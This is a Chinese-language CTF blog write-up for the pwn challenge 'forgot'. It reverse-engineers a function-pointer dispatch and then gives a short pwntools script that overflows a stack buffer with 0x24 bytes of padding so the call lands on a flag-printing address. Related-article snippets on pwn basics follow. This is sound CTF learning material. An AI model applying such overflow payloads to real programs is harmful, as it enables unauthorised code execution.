[pwn]逻辑复杂利用简单

最新推荐文章于 2024-02-25 17:42:44 发布
最新推荐文章于 2024-02-25 17:42:44 发布
阅读量7.5k 收藏 1
点赞数 1
分类专栏: 二进制 ctf # ctf-pwn 文章标签: 安全 二进制安全 ctf pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Breeze_CAT/article/details/100086845
版权
二进制 同时被 3 个专栏收录
56 篇文章 17 订阅
订阅专栏
ctf
30 篇文章 3 订阅
订阅专栏
ctf-pwn
25 篇文章 4 订阅
订阅专栏

逻辑复杂利用简单的pwn

遇到了一道坑有很多的题,记录一下。题目:forgot,题目地址:forgot

首先查看安全策略
在这里插入图片描述
不是很高,就一个NX,看看代码逻辑吧,直觉告诉我并不简单:
在这里插入图片描述
在这里插入图片描述
一张图放不下,其实有溢出,但我由于主函数太长了还一堆小函数,没注意(吓到了)。中间switch之中的一堆小函数都是判断是不是字母、数字、下划线之类的,比如:
在这里插入图片描述
在这里插入图片描述
而且最后有个调用:
在这里插入图片描述
调用的值又和v14有关,导致我没有最开始仔细分析如何调用而去分析上面那个switch的逻辑了,其实就是根据用户输入的字符串的格式不同给v14赋不同的值。完整的逻辑是一个类似邮箱的字符串cat@cat.com这种,就会让v14值为10,其他的根据完整成都值不同。最后调用V3+v14-1这个地址。在上面代码中可以看出,v3-v12都在最开始赋了一个函数,都是一些输出字符串的函数。 这里看反汇编代码不好明白这个是怎么计算的,直接看汇编代码:
在这里插入图片描述
将v14-1,然后调用v3变量下面v14值对应的变量指向的函数。由于小函数实在太多,我没有一个一个去看,通过string表发现了一个函数:
在这里插入图片描述
函数有了,然后发现逻辑只要我们输入的字符串前面是小写字母并且之中没有@,那么v14的值就一直是2,最后减1编程1,最后调用的就是v4,溢出点在:
在这里插入图片描述
计算v2和v4的相对位移,然后覆盖就好,具体看exp:

from pwn import *

p=process("./3d000793d15b444ab46e99e165e9454b")

flag_addr=0x80486CC
payload='a'*0x24+p32(flag_addr)

print p.recv()
p.sendline("chen")
print p.recv()
p.sendline(payload)
print p.recv()

可谓一顿操作猛如虎,一看溢出一步走!
在这里插入图片描述

breezeO_o
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一些代码中的逻辑习惯
行码棋
05-07 1202
代码逻辑习惯或一些小操作(自己的笔记) 1.需要一个数组或者字符串的目前的元素和前一个元素做相关运算时: 直接遍历这个序列,当 i 等于0时不满足条件,只有i 等于 1时才会执行if语句 for(int i=0;i<len;++i) { if( i && 相关的运算) ... } 2.与前一个元素做相关运算 我偏向定义一个变量pre代表前一个元素,然后从第二个位置开始遍历 感觉这样的代码确实有点多了,而且每次要更新pre的值 int pre = num[1]; for(int i=
代码逻辑
weixin_38410551的博客
06-13 5084
代码逻辑要尽量简洁,符合处理问题的逻辑。 开始写函数时,就要考虑清楚函数需要解决的问题,函数的输入输出。而且函数模块的可复用性要高。
看雪pwn入门--基础篇
泣当歌的计算机小白之路
03-28 2640
1.pwn理论基础  小菜: 什么是溢出 概念:在计算机中,当要表示的数据超出计算机使用的数据表示范围时,产生数据的溢出 原因:使用非类型安全的语言入C/C++等            以不可靠的方式存取或者复制内存缓冲区            编译器设置内存缓冲区太靠近关键数据结
PWN入门程序装载与虚拟内存 小白笔记
小白垃圾笔记2
02-02 366
CPU和硬件最终访问的都是物理内存,但是由于物理内存的一些机制,所以对于程序员不太友好。不同的功能区域被划分为不同的节。不同的功能区域根据读写权限划分为一个一个段,然后在虚拟内存中发挥作用。节根据读写权限不同被划分为不同的段,然后不同的段由系统完成映射。节视图是在磁盘中划分功能的,段试图是程序装载在内存中划分不同的读写执行权限的。整个4GB是这样一个结构,最上边的kernel(内核空间)是共享的。执行的时候,是将磁盘中的可执行文件(a.out)映像到内存中。这里的右边的图片中内存地址的单位是bits。
代码逻辑分析_架构漫谈(八):从架构的角度看如何写好代码
weixin_39536728的博客
11-23 893
在第六篇文章中,我们得出一个结论,软件架构实际上包括了:代码架构,以及承载代码运行的硬件部署架构。实际上,硬件部署架构最终还是由代码的架构来决定。因为代码架构不合理,是无法把一个运行单元分拆出多个来的,那么硬件架构能分拆的就非常的有限,整个系统最终很难长的更大。所以我们经常会听说,重写代码,推翻原有架构,重新设计等等说法,来说明架构的进化。这实际上就是当初为了完成任务,没有充分思考所带来的后果。这...
pwn100题目文件及exp.zip
08-09
在IT安全领域,尤其是逆向工程和漏洞利用中,“pwn”是一个常见的术语,它涵盖了对软件漏洞的利用,特别是那些允许攻击者获得系统控制权的漏洞。本资源中的“pwn100”可能是一个初级级别的CTF(Capture The Flag)...
基于FPGA的PWN输出实现
12-18
【PWM技术概述】 PWM,全称为脉冲宽度调制(Pulse Width ...总结来说,通过FPGA利用Verilog实现PWM输出,不仅能够满足高性能和实时性要求,还能够灵活地适应各种应用需求,体现出FPGA在数字信号处理领域的强大潜力。
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
它支持数据类型、操作符、结构体以及过程语句,使得描述复杂的数字系统变得简单。 **PWM信号** 是一种常用于控制功率输出、模拟信号生成和通信的技术。它通过改变周期内高电平持续时间(占空比)来表达一个模拟值,...
一个实例讲解fastbins上的堆利用附件
09-06
最后,`exp.py`是一个Python脚本,很可能包含了利用漏洞的代码逻辑,例如创建伪造的对象,操纵内存布局,以及最终执行任意代码。 为了彻底理解这个实例,你需要分析`exp.py`脚本,查看它如何构造输入以触发特定的堆...
gef-extras:GEF的额外优惠
03-31
Python是一种广泛用于自动化和脚本化的语言,其在调试工具中的应用使得用户可以自定义复杂的调试逻辑,创建新的命令和功能。 **Linux调试** 在Linux操作系统中,gef-extras使得GDB能够更好地适应现代调试需求。它...
CTF比赛中的常见题型
11-13
CTF比赛中的常见题型目录,给初学者提供学习方向。CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
通过mmap&mprotect来绕过nx
qq_45595732的博客
03-24 1068
mmap mmap函数的用法 mmap将一个文档或者其它对象映射进内存。文档被映射到多个页上,如果文档的大小不是所有页的大小之和,最后一个页不被使用的空间将会清零。mmap在用户空间映射调用系统中作用很大。 头文档 <sys/mman.h> void* mmap(void* start,size_t length,int prot,int flags,int fd,off_t offset); 第一个参数:分配新内存的地址 第二个参数:新内存的长度(0x1000的倍数),长度单位是字节,不足一
Javris OJ - pwn level5(mmap和mprotect练习)(_libc_csu_init中的通用gedget的使用)
hanqdi_的博客
02-14 1743
pwn level5 这个题和level3-64的附件一样,level5要求不用system和execve,而是用mprotect和mmap,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。 可以这样做:利用shellcode,利用read函数把shellcode写入bss段,这里要求写入...
代码基本逻辑
weixin_44656422的博客
03-17 262
业务逻辑:我要给plc传一个值a=7,我要去检验plc有没有收到这个值,如果没有收到这个值,我要再传一遍值,直到plc里真的收到这个值了。代码逻辑:一直发a的值给plc,检查plc有没有收到。简洁版:循环发送值直到PLC接收到指定值为止。
06 | 代码整理的关键逻辑和最佳案例
qq_37756660的博客
01-28 1272
写一篇文章,要层次清楚、段落分明,写代码也是这样。杂志排版,要布局合理,阅读舒适,代码的编排也要这样。可是很多人想的是,代码能工作就行,不用讲究格式;时间紧,哪有时间整理代码。可事实上,干净整洁的代码带给我们的,远远不止格式上的赏心悦目,它更可以减少错误,提高我们的编程速度与效率。因为代码的层次结构、格式部署,是我们对自己思维的整理,也是我们思考逻辑的展现。很多人不愿意整理代码,觉得这项工作很麻烦。其实代码的整理并不复杂,也不需要什么高深的技巧。
从零开始入门pwn(一):pwn的介绍以及部分前置知识
热门推荐
m0_51466347的博客
12-06 4万+
目录 一.前言 二.pwn的介绍 pwn的定义 pwn的题目模式 前置知识 一.Linux 二.C语言 三.汇编语言 四.计算机组成原理 三.总结 一.前言 本人凭着一腔热血想要入门pwn,但却被pwn的高入门门槛泼了一次又一次冷水,趁着自己还记得,写一点心得为后来想入门的跟我一样的零基础新手提供一些帮助。 二.pwn的介绍 pwn的定义 想必很多想要入门的新手都已经通过各种各样的入门文章或视频了解了pwn的定义以及方向,但出于礼貌,我在这里还是再重复一下下。...
[VNCTF2024]-PWN:shellcode_master解析(orw,用mmap代替read读文件)
最新发布
2301_79326813的博客
02-25 750
查看保护查看ida在sandbox函数中,函数先使用了seccomp_init初始化,允许了所有系统调用,再用seccomp_rule_add来禁用掉了部分系统调用,其中包括execve和readseccomp_init函数可以进行系统调用全禁用和全允许初始化seccomp_rule_add函数可以运行或禁用部分系统调用题目很明显地提示要使用shellcode,我们可以使用两种方式去编写shellcode。
Pwn基础学习1-[栈溢出]/篇1
m0_52343643的博客
03-14 6950
是缓冲区溢出的一种,当缓冲区数据大于缓冲区大小时,缓冲区之外的有用数据就会被多出去的缓冲区数据覆盖改写,从而可能导致程序崩溃。
代码逻辑整理
lee__7的博客
12-30 1336
构建神经网络 输入 函数 get_inputs() user相关:uid, user_gender,user_age,user_job movie相关:movie_id,movie_categories,movie_titles 定义user矩阵 函数 get_user_embedding( ) uid_embed_layer,gender_embed_layer,age_embed_layer,job_embed_layer 将User的嵌入矩阵一起全连接生成User的特征 函数 get_us
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值